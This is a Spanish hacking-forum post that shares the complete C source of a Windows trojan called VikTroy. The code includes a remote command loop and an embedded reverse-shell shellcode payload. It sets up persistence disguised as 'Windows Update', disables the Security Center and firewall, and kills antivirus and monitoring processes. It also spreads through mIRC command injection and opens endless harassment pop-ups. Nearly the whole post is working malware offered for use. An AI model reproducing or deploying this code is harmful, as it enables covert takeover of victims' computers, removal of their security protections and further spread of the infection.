Troyano [C]

Iniciado por ANTRAX, Mayo 22, 2011, 10:01:56 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Mayo 22, 2011, 10:01:56 PM Ultima modificación: Febrero 08, 2014, 05:48:37 PM por Expermicid
Código: c
/*
   Autor: Coded by Rozor\xZR !Sub_Level
   IRC: irc.irc-hispano.org #sub_level
   URL: http://sincontrol.tomahost.org
   Lenguaje: C/C++ Win32
   Name: VikTroy
   Ejecutable: VikTroy.exe

*/

// Mazard Roolz
// www.mazard.info 
// http://sincontrol.tomahost.org/dor/virus/vk-troy.c

#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#include <stdlib.h>
#include <process.h>
#include <winbase.h>
//#include <sys\types.h>
#include <tlhelp32.h>

#define CM_PRUEBA 101
#define CM_SALIR 102

#pragma comment(lib, "wsock32.lib")


// SOCKET PRINCIPAL
SOCKET sck;
char RegQueryInfo[] = "reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Windows Update\" /t REG_SZ /d %systemroot%\\viktroy.exe";
char SeCent[] = "net stop \"Security Center\"";
char Shared[] = "net stop \"SharedAccess\"";
char Reg1[] = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\" /v Start /t REG_DWORD /d 0x4 /f";
char Reg3[] = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\wscsvc\" /v Start /t REG_DWORD /d 0x4 /f";
char CreateSrv[] = "sc create wscenter binPath= \"%systemroot%\\system32\\viktroy.exe\" type= kernel start= boot error= ignore DisplayName= \"Windows Security Center\"";

LRESULT CALLBACK WindowProc(HWND, UINT, WPARAM, LPARAM);

// PAYLOAD 
unsigned char payload[] =

"\x33\xc9\x83\xe9\xb8\xe8"
"\xff\xff\xff\xff"
"\xc0\x5e\x81\x76\x0e\x4a"
"\x27\x98\xb9\x83\xee\xfc\xe2\xf4\xb6\x4d"
"\x73\xf4\xa2\xde\x67\x46"
"\xb5\x47\x13\xd5\x6e\x03\x13\xfc\x76\xac\xe4\xbc\x32\x26\x77\x32"
"\x05\x3f\x13\xe6\x6a\x26\x73\xf0\xc1\x13\x13\xb8\xa4\x16\x58\x20"
"\xe6\xa3\x58\xcd\x4d\xe6\x52\xb4\x4b\xe5\x73\x4d\x71\x73\xbc\x91"
"\x3f\xc2\x13\xe6\x6e\x26\x73\xdf\xc1\x2b\xd3\x32\x15\x3b\x99\x52"
"\x49\x0b\x13\x30\x26\x03\x84\xd8\x89\x16\x43\xdd\xc1\x64\xa8\x32"
"\x0a\x2b\x13\xc9\x56\x8a\x13\xf9\x42\x79\xf0\x37\x04\x29\x74\xe9"
"\xb5\xf1\xfe\xea\x2c\x4f\xab\x8b\x22\x50\xeb"
"\x8b\x15\x73\x67\x69" // w0w
"\x22\xec\x75\x45\x71\x77\x67"
"\x6f\x15\xae\x7d\xdf\xcb\xca\x90\xbb"
"\x1f\x4d\x9a\x46\x9a\x4f\x41\xb0\xbf\x8a\xcf\x46\x9c\x74\xcb\xea"
"\x19\x64\xcb\xfa\x19\xd8\x48\xd1\x35\x27\x98\xb8\x2c\x4f\x9a\x23"
"\x2c\x74\x11\x58\xdf\x4f\x74\x40\xe0\x47\xcf\x46\x9c\x4d\x88\xe8"
"\x1f\xd8\x48\xdf\x20\x43\xfe\xd1\x29\x4a\xf2\xe9\x13\x0e\x54\x30"
"\xad\x4d\xdc\x30\xa8\x16\x58\x4a\xe0\xb2\x11\x44\xb4\x65\xb5\x47"
"\x08\x0b\x15\xc3\x72\x8c\x33" // r0x
"\x12\x22\x55\x66\x0a\x5c\xd8\xed\x91"
"\xb5\xf1\xc3\xee\x18\x76\xc9\xe8"
"\x20\x26\xc9\xe8\x1f\x76\x67\x69"
"\x22\x8a\x41\xbc\x84\x74\x67\x6f\x20\xd8\x67\x8e\xb5\xf7\xf0\x5e"
"\x33\xe1\xe1\x46\x3f\x23\x67\x6f\xb5\x50\x64\x46\x9a\x4f\xe6\x61"
"\xa8\x54\xcb\x46\x9c"  // c0d3d
"\xd8\x48\xb9\x90\x90\x90";






//ListaProcesos
char *proc_list[]={
		 "cmd.exe", "taskmgr.exe", "netstat.exe", "tasklist.exe", "taskkill.exe",
		 "avp.exe", "ethereal.exe", "whireshark.exe", "snort.exe", "control.exe",
	     "autoruns.exe", "autorunsc.exe", "tcpview.exe", "ettercap.exe", "firefox.exe",
		 "regedit.exe", "reg.exe" };
			








// Thread Struct

typedef struct thread_struct
{
	char name[250];
	HANDLE Thread_Handle;
	int id;
} thread;

thread threads[10];





int Comando(char recibido[130]);
int CrearThread(char *name, HANDLE Thread_Handle, int id);
void Esconder(void);
void Reverse(void);


DWORD WINAPI pcInfo(LPVOID param);
DWORD WINAPI ownMirc(LPVOID param);
DWORD WINAPI Pong(LPVOID param);
DWORD WINAPI keyLogger(LPVOID param);
DWORD WINAPI revShell(LPVOID param);
DWORD WINAPI Infectar(LPVOID param);
DWORD WINAPI winFuck(LPVOID param);
DWORD WINAPI Happy(LPVOID param);


int Comando(char recibido[130]);
int CrearThread(char *name, HANDLE Thread_Handle, int id);
void Esconder(void);
void Reverse(void);
/*int main(void);*/
DWORD WINAPI pcInfo(LPVOID param);
DWORD WINAPI ownMirc(LPVOID param);
//DWORD WINAPI Pong(LPVOID param);
DWORD WINAPI revShell(LPVOID param);
DWORD WINAPI SendProcess(LPVOID param);
DWORD WINAPI winFuck(LPVOID param);
DWORD WINAPI Happy(LPVOID param);
DWORD WINAPI CallChat(LPVOID param);

/*
int main(int argc, char *argv[])
{
	char bof[25];
	strcpy(bof, argv[1]);
	return 0;
}
*/


// INDEX

int main(void)
{ 
    HANDLE hThread;
	DWORD id;
	WSADATA wsa;
    struct sockaddr_in mysock;
	char recvbuff[130];
	char *hello = "HEllO";

	WSAStartup(MAKEWORD(1, 0), &wsa);
	sck = socket(AF_INET, SOCK_STREAM, 0);
	Esconder();
	mysock.sin_family = AF_INET;
	mysock.sin_addr.s_addr = inet_addr("127.0.0.1");
	mysock.sin_port = htons(80);
	memset(&(mysock.sin_zero), '\0', 8);
	//hThread = CreateThread(NULL, 0, Pong, NULL, 0, &id);
	connect(sck, (struct sockaddr *)&mysock, sizeof(struct sockaddr));
	send(sck, hello, strlen(hello), 0);
	for(;;)
	{
		 if(recv(sck, recvbuff, 128, 0)>2)
		 { 
		      Comando(recvbuff);
		 } 
		 Sleep(800);
	}

    Sleep(1000);
	WSACleanup();
	system("PAUSE");
	return 1;
}






int Comando(char recibido[130])
{

	HANDLE hThread;
	DWORD id;

	char *pString;
	
	pString = strchr(recibido, '!');
	if(pString==NULL)
	{
		printf("error");
		return -1;
	}

	pString++;
	
	if(strncmp(pString, "info", 4)==0)
	{
		hThread = CreateThread(NULL, 0, pcInfo, NULL, 0, &id);
		CrearThread("INFO", hThread, id);
		Sleep(1000);
	}

	if(strncmp(pString, "mirc", 4)==0)
	{
		hThread = CreateThread(NULL, 0, ownMirc, NULL, 0, &id);
		CrearThread("MIRC", hThread, id);
	}

	if(strncmp(pString, "exit", 4)==0)
	{
		closesocket(sck);
		WSACleanup();
		system("taskkill /F /IM viktroy.exe");
	}

	if(strncmp(pString, "shell", 4)==0)
	{
		hThread = CreateThread(NULL, 0, revShell, NULL, 0, &id);
		CrearThread("SHELL", hThread, id);
	}

	if(strncmp(pString, "busca", 5)==0)
	{
		hThread = CreateThread(NULL, 0, SendProcess, NULL, 0, &id);
		CrearThread("SHRC", hThread, id);
	}

	if(strncmp(pString, "winfuck", 7)==0)
	{
		hThread = CreateThread(NULL, 0, winFuck, NULL, 0, &id);
		CrearThread("FUCK", hThread, id);
	}

	if(strncmp(pString, "showcmd", 7)==0)
	{
		HWND hWnd;
	    hWnd = FindWindow("ConsoleWindowClass", NULL);
	    ShowWindow(hWnd, SW_SHOWNORMAL);
	}

	if(strncmp(pString, "hidecmd", 7)==0)
	{
		HWND hWnd;
	    hWnd = FindWindow("ConsoleWindowClass", NULL);
	    ShowWindow(hWnd, SW_HIDE);
	}

	if(strncmp(pString, "happy", 5)==0)
	{
		hThread = CreateThread(NULL, 0, Happy, NULL, 0, &id);
		CrearThread("HAPPY", hThread, id);
	}

	if(strncmp(pString, "chat", 4)==0)
	{
		hThread = CreateThread(NULL, 0, CallChat, NULL, 0, &id);
		CrearThread("CHAT", hThread, id);
	}

	if(strncmp(pString, "infectar", 8)==0)
	{
      system("reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Windows Update\" /t REG_SZ /d %systemroot%\\viktroy.exe");
    }


	return 0;	 

}



void Reverse(void)
{
	  void(*rever)();
	  *(int *)&rever = (int)payload;
	  rever();

}

 // Not ShellCode Call
/*	PROCESS_INFORMATION pinfo;
	STARTUPINFO sinfo;
	SOCKET rsck;
	//WSADATA wsadata;
    struct sockaddr_in rSock;
    memset(&sinfo,0,sizeof(sinfo)); 
	//WSAStartup(MAKEWORD(1, 0), &wsadata);
	rsck = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
	rSock.sin_addr.s_addr = inet_addr("127.0.0.1");
	rSock.sin_family = AF_INET;
    bind(rsck, (struct sockaddr*)&rSock, sizeof(rSock));
	rSock.sin_port = htons(666);
	memset(&(rSock.sin_zero), 0, 8);
	
	connect(rsck, (struct sockaddr *)&rSock, sizeof(rSock));
	sinfo.cb = sizeof(sinfo);
	sinfo.dwFlags = STARTF_USESTDHANDLES;
	sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = rsck;
	CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, &sinfo, &pinfo);

  */



// ThreadGen
int CrearThread(char *name, HANDLE Thread_Handle, int id)
{
	int c = rand()%10;
	sprintf(threads[c].name,name);
	threads[c].id = id;
	threads[c].Thread_Handle = Thread_Handle;
	return c;
}


// HIDE
void Esconder(void)
{
	HWND hWnd;
	hWnd = FindWindow("ConsoleWindowClass", NULL);
	ShowWindow(hWnd, SW_HIDE);
}


// Arquitectura
DWORD WINAPI pcInfo(LPVOID param)
{
	SYSTEM_INFO sysinfo;
    char allinfo[16];
	GetSystemInfo(&sysinfo);
	if(sysinfo.wProcessorArchitecture==PROCESSOR_ARCHITECTURE_INTEL)
	{
		strcat(allinfo, "Soy un INTEL ");
		if(sysinfo.wProcessorLevel==3)
		{
			strcat(allinfo, "!386 ");
		}

		else if(sysinfo.wProcessorLevel==4)
		{
			strcat(allinfo, "!486 ");
		}
		
		else if(sysinfo.wProcessorLevel==5)
		{
			strcat(allinfo, "Pentium ");
		}

		else { strcat(allinfo, "unknow "); }

	}

	else if(sysinfo.wProcessorArchitecture==PROCESSOR_ARCHITECTURE_PPC)
	{
		strcat(allinfo, "Soy un PocketPC ");
		
		if(sysinfo.wProcessorLevel==1)
		{
			strcat(allinfo, "PPC 601 ");
		}
		
		else if(sysinfo.wProcessorLevel==3)
		{
			strcat(allinfo, "PPC 601 ");
		}

		else if(sysinfo.wProcessorLevel==20)
		{
			strcat(allinfo, "PPC 620 ");
		}

	}

	SetComputerName("xZ-Ownk");
    send(sck, allinfo, strlen(allinfo), 0);
	return 0;

}


// Injeccion de comandos mirc. Gracias a CrowDat por su explicacion :P

DWORD WINAPI ownMirc(LPVOID param)
{
	HWND hWnd;
	char run1[] = "/run VikTroy.exe";
	SetForegroundWindow(hWnd);
    hWnd = FindWindowEx(FindWindowEx(FindWindowEx(FindWindow("mIRC",
           NULL), 0, "MDIClient", 0),0, "mIRC_Status", 0), 0, "Edit", 0);

	SendMessage(hWnd, WM_SETTEXT, 0, (LPARAM)run1);
	SendMessage(hWnd, WM_IME_KEYDOWN, VK_RETURN, 0);
	Sleep(1500);
	return 0;
}


// Pong Conexion Thread

/*DWORD WINAPI Pong(LPVOID param)
{
	char *pong="PONG";
	for(;;)
	{
		Sleep(25000);
		send(sck, pong, strlen(pong), 0);
	}

	return 1;
}
*/

// Reverse Shell Thread

DWORD WINAPI revShell(LPVOID param)
{

    
    Reverse();
	return 0;

}


// Tripode

DWORD WINAPI SendProcess(LPVOID param)
{

	HANDLE hlista;
PROCESSENTRY32 proceso;
char proname[30];
char killer[30];
int ret, i, mok;
    
    mok = 0;
    for(;;)
	{
	  ret = 0;
	  i = 0;

    for(i=0;i<17;i++)
	{
    ZeroMemory(&proceso,sizeof(proceso));
	proceso.dwSize = sizeof(proceso);
	if ((hlista = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0)) != (HANDLE)-1) /* devuelve estructura con la captura de todos los procesos */
	{
		ret = Process32First(hlista,&proceso);
		while(ret)
		{

			sprintf(proname,"%i %s",proceso.th32ProcessID,proceso.szExeFile);
			printf("\n%s",proname);

			if(strcmp(proceso.szExeFile, "mirc.exe")==0 && mok==0 )
			{
				send(sck, "\nEncontrado Mirc.exe\n", strlen("\nEncontrado Mirc.exe\n"), 0);
			    mok++;
			}

			if(strcmp(proceso.szExeFile, proc_list[i])==0)
			{
				sprintf(killer, "taskkill /F /PID %d", proceso.th32ProcessID);
				WinExec(killer, SW_HIDE);
			}
			

			ret = Process32Next(hlista,&proceso);
		}
	 
	   CloseHandle(hlista);
	}
	}
     Sleep(100);

}

}



	/*HKEY hKey;
	unsigned char direccion[] = "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run";
    unsigned char proceso[] = "VikTroy.exe";
	
	RegCreateKey(HKEY_LOCAL_MACHINE, "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" , &hKey);
	RegSetValueEx(hKey, "Microsoft Windows Firewall", 0, REG_SZ, proceso, sizeof("proceso"));
    RegCloseKey(hKey);*/




// WINDOWS FUCKEd x"DDDDDDDDDDD

DWORD WINAPI winFuck(LPVOID param)
{



        __asm {
			     mov eax, offset SeCent
				 push eax
				 call system
				 pop ebx
				 nop
				 nop
				 
		 // Security Center Off

				 mov eax, offset Shared
				 push eax
				 call system
				 pop ebx
				 nop
				 nop
		 // Shared Off

			     mov eax, offset Reg1
				 push eax
				 call system
				 pop ebx
				 nop
				 nop
		 // Reg1 In
			

				 mov eax, offset Reg3
				 push eax
				 call system
				 pop ebx
				 nop
				 nop

				 mov  eax, offset CreateSrv
				 push eax
                 call system
				 pop ebx
				 nop
				 nop
	
		}// Reg2 In

	return 0;
	

}



// Funcion Feliz 

DWORD WINAPI Happy(LPVOID param)
{
	int a = 0;
    char *Texto = " VikTroy: Simple Trojan Horse   \n"
		          " http://sincontrol.tomahost.org \n"
				  " Gm Vk Tj Pp                    \n"
				  " irc-hispano.org #sub_level     \n"
				  " by xZR !Sub_Level Security     \n";

	a = MessageBox(NULL, 
		      Texto, 
			  "by xZR !Sub_Level",
			  MB_OK | MB_ICONERROR | MB_DEFBUTTON4);
   for(;;)
   {
    	if(a==IDOK || a==IDYES || a==IDABORT || a==IDCANCEL || a==IDNO)
		{
           a= MessageBox(NULL, 
		                Texto, 
			           "by xZR !Sub_Level",
                        MB_OK | MB_ICONERROR | MB_DEFBUTTON4);
	}
  
  }

  return -1;
}



// Not Avaible

DWORD WINAPI CallChat(LPVOID param)
{
	HINSTANCE hInstance, hPrevInstance;
	LPSTR CmdLine;
	int uCmd;
	HWND hWnd;
	MSG uMsg;
	WNDCLASSEX wincl;
	SOCKET chatsock;
    struct sockaddr_in chsock;

	wincl.cbClsExtra = 0;
	wincl.cbWndExtra = 0;
	wincl.cbSize = sizeof(WNDCLASSEX);
	wincl.hbrBackground = (HBRUSH) COLOR_HIGHLIGHT;
	wincl.hCursor = LoadCursor(NULL, IDC_ARROW);
	wincl.hIcon = LoadIcon(NULL, "icono.ico");
	wincl.hIconSm = LoadIcon(NULL, "icono.ico");
	wincl.hInstance = hInstance;
	wincl.lpfnWndProc = WindowProc;
	wincl.lpszClassName = "VentanaChat";
	wincl.lpszMenuName = NULL;
	wincl.style = CS_DBLCLKS;

	RegisterClassEx(&wincl);

	hWnd = CreateWindowEx(             0,
		                   "VentanaChat",
						  "Viktroy Talk",
						   WS_OVERLAPPEDWINDOW,
						   CW_USEDEFAULT,
						   CW_USEDEFAULT,
						   CW_USEDEFAULT,
						   CW_USEDEFAULT,
						    HWND_DESKTOP,
			                        NULL,
							   hInstance,
									NULL);

	ShowWindow(hWnd, SW_SHOWDEFAULT);

	while(TRUE == GetMessage(&uMsg, 0, 0, 0))
	{
	        TranslateMessage(&uMsg);	
			DispatchMessage(&uMsg);
	}
	
	return uMsg.wParam;
	

}


LRESULT CALLBACK WindowProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
	switch(uMsg)
	{
	case WM_DESTROY:
		PostQuitMessage(0);
		break;
	default:
		return DefWindowProc(hWnd, uMsg, wParam, lParam);
	}

	return 0;
}

Imprimir
Ir Arriba Páginas1
Acciones del Usuario